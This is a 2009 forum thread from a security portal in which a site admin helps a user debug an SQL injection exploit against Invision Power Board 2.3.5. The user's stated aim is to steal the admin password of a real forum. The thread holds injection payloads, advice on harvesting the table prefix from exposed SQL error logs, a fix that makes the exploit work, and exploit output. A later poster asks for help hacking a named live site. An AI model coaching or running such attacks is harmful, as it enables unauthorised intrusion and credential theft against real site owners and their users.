Waraxe IT Security Portal
Login or Register
November 25, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 55
Members: 0
Total: 55
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> Help Important! Hacking IPB 2.3.5
Post new topicReply to topic View previous topic :: View next topic
Help Important! Hacking IPB 2.3.5
PostPosted: Sun Jan 25, 2009 11:41 pm Reply with quote
Cablekid
Advanced user
Advanced user
Joined: Jul 14, 2007
Posts: 85




Alright i need help!

I tried waraxe exploit on it but it failed?

But yet if i do http://www.site.com/index.php?act=xmlout&do=check-display-name&name=%2527

It comes up IPS Driver Error.

Why cant i get this to work? I really need the get the admin's pw on this forum is important!


The board has freindly seo, so the urls end with .html but that shoulden't matter.
View user's profile Send private message
PostPosted: Sun Jan 25, 2009 11:58 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Do you get error message from exploit?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Jan 26, 2009 4:38 am Reply with quote
Cablekid
Advanced user
Advanced user
Joined: Jul 14, 2007
Posts: 85




Hey, ya i get the error message from the exploit.


I also tried this

Code:
index.php?act=xmlout&do=check-display-name&name=%%2527%20OR%201=%%2522%%2527%%2522%20%s%20OR%201=%%2522%%2527%%2522--
And i get IPS error.


The error i get is Invalid response, target URL not valid? Exiting ...
View user's profile Send private message
PostPosted: Mon Jan 26, 2009 11:25 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Try this three tests and describe server response:

Code:

act=xmlout&do=check-display-name&name=whatever98321%2527+OR+1=1--+


Code:

act=xmlout&do=check-display-name&name=whatever98321%2527+OR+1=1/*


Code:

act=xmlout&do=check-display-name&name=whatever98321%2527+OR+1=1%23
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Jan 26, 2009 5:46 pm Reply with quote
Cablekid
Advanced user
Advanced user
Joined: Jul 14, 2007
Posts: 85




Okay This Is In order as your post.

Code:
IPS Driver Error
There appears to be an error with the database.
You can try to refresh the page by clicking here


Code:
IPS Driver Error
There appears to be an error with the database.
You can try to refresh the page by clicking here


Code:
found
View user's profile Send private message
PostPosted: Mon Jan 26, 2009 9:23 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Good, so the problem seems to be in comments. Now open exploit with text editor and replace "-- " with "%23", this should be found in two places.
Let me know about results Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Jan 26, 2009 9:59 pm Reply with quote
Cablekid
Advanced user
Advanced user
Joined: Jul 14, 2007
Posts: 85




When i changed the -- to %23 under function test_target_url() i get

Code:
Sql table prefix: ibf_
Testing target URL ...
Target URL seems to be valid
Testing ID 461 Sql error! Wrong prefix? Exiting ...


Then i changed the -- to %23 under function test_condition($p)

i get

Code:
Warning: sprintf() [function.sprintf]: Too few arguments in localhost/ex.php on line 318
test_condition() - try 1 - invalid return value ...
Trying again - try 2 ...
test_condition() - try 2 - invalid return value ...
Trying again - try 3 ...
test_condition() - try 3 - invalid return value ...
Trying again - try 4 ...
test_condition() - try 4 - invalid return value ...
Trying again - try 5 ...
test_condition() - try 5 - invalid return value ...
Trying again - try 6 ...
test_condition() - try 6 - invalid return value ...
Trying again - try 7 ...
test_condition() - try 7 - invalid return value ...
Trying again - try 8 ...
test_condition() - try 8 - invalid return value ...
Trying again - try 9 ...
test_condition() - try 9 - invalid return value ...
Trying again - try 10 ...
test_condition() - try 10 - invalid return value ...
Too many tries - exiting ...



So now i guess it has a different table prefix? so that means unhackable?
View user's profile Send private message
PostPosted: Tue Jan 27, 2009 11:38 pm Reply with quote
Cablekid
Advanced user
Advanced user
Joined: Jul 14, 2007
Posts: 85




:S Still with me lol
View user's profile Send private message
PostPosted: Tue Jan 27, 2009 11:47 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You can try to guess/bruteforce/dictionary attack prefix. Or try to use INFORMATION_SCHEMA, if mysql ver. >= 5.x
Of course this means exploit rewriting Smile

One more thing: IPB <=2.3.5 usually writes sql errors to log file.
Example:

Code:

http://localhost/ipb.2.3.5/cache/sql_error_log_12_05_08.cgi


This error file contains errors occured in 05. december 2008
You can read error messages in file if:

1. those files exist (ipb may not write them at all)
2. if webserver does not give you error 401,403 or 500

But if you are lucky, then inside log file you can find something like this:

Code:

===================================================
Date: Fri, 05 Dec 2008 18:01:44 +0200
Error Number: 1064
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' LIMIT 0,1' at line 1
IP Address: 127.0.0.1
Page: /ipb.2.3.5/index.php?act=xmlout&do=check-display-name&name=%2527
mySQL query error: SELECT members_display_name, id FROM ibf_members WHERE members_l_display_name=''' LIMIT 0,1
===================================================


As you can see, there is prefix in plaintext Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jan 28, 2009 12:50 am Reply with quote
Cablekid
Advanced user
Advanced user
Joined: Jul 14, 2007
Posts: 85




I guess im lucky kind of? Its not the prefix causing the error?

The Logs are their. it says the prefix is ibf_

Here is an example

I did this from January the latest..
Couldent find the one i produced because i dont think its in their.

Code:


Date: Tue, 27 Jan 2009 00:00:11 -0500
Error Number: 1017
Error: Can't find file: 'ibf_profile_portal_views' (errno: 2)
IP Address: XXXXXXXXXX
Page: /xxjj-x23474.html
mySQL query error: INSERT INTO ibf_profile_portal_views (views_member_id) VALUES(37474)



Here some from the befor Dec 21...

Code:
Date: Thu, 18 Dec 2008 04:11:17 -0600
Error Number: 2013
Error: Lost connection to MySQL server during query
IP Address: XX.xx.XXX.XXX
Page: /lofiversion/index.php/t33214710.html
mySQL query error: INSERT INTO ibf_sessions (id,member_name,member_id,member_group,login_type,running_time,ip_address,browser,location,in_error,location_1_type,location_1_id,location_2_type,location_2_id,location_3_type,location_3_id) VALUES('1259046c1954531cd90097d3142b1293','',0,2,0,1229595016,'XXX.XXX.XXX.XXX,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5',',0,',0,'',0,'',0,'',0)
===================================================
View user's profile Send private message
PostPosted: Wed Jan 28, 2009 7:24 am Reply with quote
Cablekid
Advanced user
Advanced user
Joined: Jul 14, 2007
Posts: 85




Ah i found my new 1 but it prefix is the same?


Code:
Date: Wed, 28 Jan 2009 02:22:59 -0500
Error Number: 1064
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' LIMIT 0,1' at line 1
IP Address: xx.xx.xx.xx
Page: /index.php?act=xmlout&do=check-display-name&name=%2527
mySQL query error: SELECT members_display_name, id FROM ibf_members WHERE members_l_display_name=''' LIMIT 0,1
View user's profile Send private message
PostPosted: Wed Jan 28, 2009 11:20 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I can see the problem now ...

Code:

Warning: sprintf() [function.sprintf]: Too few arguments in localhost/ex.php on line 318


"%23" must be "%%23" in that place, because it will be argument of "sprintf()"!
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jan 28, 2009 5:32 pm Reply with quote
Cablekid
Advanced user
Advanced user
Joined: Jul 14, 2007
Posts: 85




Haha that was it! Thanks alot!!@!@!

Now i just gotta crack these hash's.
View user's profile Send private message
PostPosted: Wed Jul 29, 2009 11:44 am Reply with quote
littlemc
Regular user
Regular user
Joined: Jul 29, 2009
Posts: 13




can i get help too?

i have the same problem
but for this forum i dont get any found on the 3 options you gave
the first 1 ends up with this errors
Code:

Warning: Cannot modify header information - headers already sent by (output started at /home/admin/domains/izra.co.il/public_html/forum/conf_global.php:31) in /home/admin/domains/izra.co.il/public_html/forum/ips_kernel/class_ajax.php on line 204



the second ends up with IPS Driver Error

and the 3rd ends up with same error as the first
please help me its really imoprtent for me to hack to this 1 and they may update it soon
View user's profile Send private message
Help Important! Hacking IPB 2.3.5
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.050 Seconds